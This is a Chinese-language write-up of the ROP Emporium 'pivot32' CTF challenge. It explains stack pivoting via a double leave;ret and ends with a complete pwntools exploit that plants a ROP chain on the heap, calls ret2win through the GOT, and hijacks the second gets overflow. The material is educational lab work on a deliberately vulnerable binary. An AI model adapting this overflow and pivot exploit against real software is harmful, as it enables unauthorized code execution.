本文主要是介绍CTF|rop emporium pivot32 writeup (栈迁移题型),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
CTF|rop emporium pivot32 writeup (栈迁移题型)
题目来源:https://ropemporium.com/challenge/pivot.html
malloc生成了一个堆区
pwnme函数里面有两个gets函数,存在栈溢出的地方,在第二个gets,但是他在填充完s之后所剩下的空间位58-0x28-4,是一个很小的空间,在这样的狭小空间里面是不足以构造rop chain的。
stack pivoting
具有这样特点的题目叫做stack pivoting。
stack pivoting,正如它所描述的,该技巧就是劫持栈指针指向攻击者所能控制的内存处,然后再在相应的位置进行 ROP。
显然我们要将ropchain写到堆区,再控制程序到堆区执行
栈迁移的方法
这道题用的方法是汇编语言leave_ret指令
leave相当于mov esp ebp
+ pop ebp
mov esp ebp操作指将ebp的值赋给esp,也就是让esp指向ebp所指的地方
pop ebp操作指将栈上ebp所指向的内容pop出来
所以我们的思路是
通过填充数据将ebp覆盖成我们想让函数执行流去到的地方(dss/data/堆区)
然后在填入leave_ret 指令
特别注意的是:其实在函数执行到我们填入的leave_ret指令之前,函数内自己也有一段leave_ret 指令,也就是说,我们这个设置栈溢出,leave_ret 指令它执行了两次。
下面简单两次leave_ret指令过程esp ebp指向(仅供参考)
红线表示esp 绿线表示ebp
mov esp ebp 之后
pop ebp之后
然后第二次mov esp ebp
最后在pop ebp后即开始处理我们布置在堆区上的指令
然后我们在堆区实现ropchain 在第二个gets函数处将执行流劫持
exp
from pwn import *p=process("./pivot32")
elf=ELF('./pivot32')
lib_elf=ELF('./libpivot32.so')func_plt=elf.plt['foothold_function']
func_got_plt=elf.got['foothold_function']
foothold_sym=lib_elf.symbols['foothold_function']
ret2win_sym=lib_elf.symbols['ret2win']
offset=int(ret2win_sym-foothold_sym)leave_ret=0x080486a8
mov_eax_eax=0x080488c4
pop_eax=0x080488c0
pop_ebx=0x08048571
add_eax_ebx=0x080488c7
call_eax=0x080486a3p.recvuntil("The Old Gods kindly bestow upon you a place to pivot: ")
fake_ebp=int(p.recv(10),16)payload1=p32(func_plt)
payload1+=p32(pop_eax)
payload1+=p32(func_got_plt)
payload1+=p32(mov_eax_eax)
payload1+=p32(pop_ebx)
payload1+=p32(offset)
payload1+=p32(add_eax_ebx)
payload1+=p32(call_eax)p.recvuntil('> ')
p.sendline(payload1)payload2='A'*40
payload2+=p32(fake_ebp-4)
payload2+=p32(leave_ret)p.recvuntil('> ')
p.sendline(payload2)
p.interactive()
这篇关于CTF|rop emporium pivot32 writeup (栈迁移题型)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!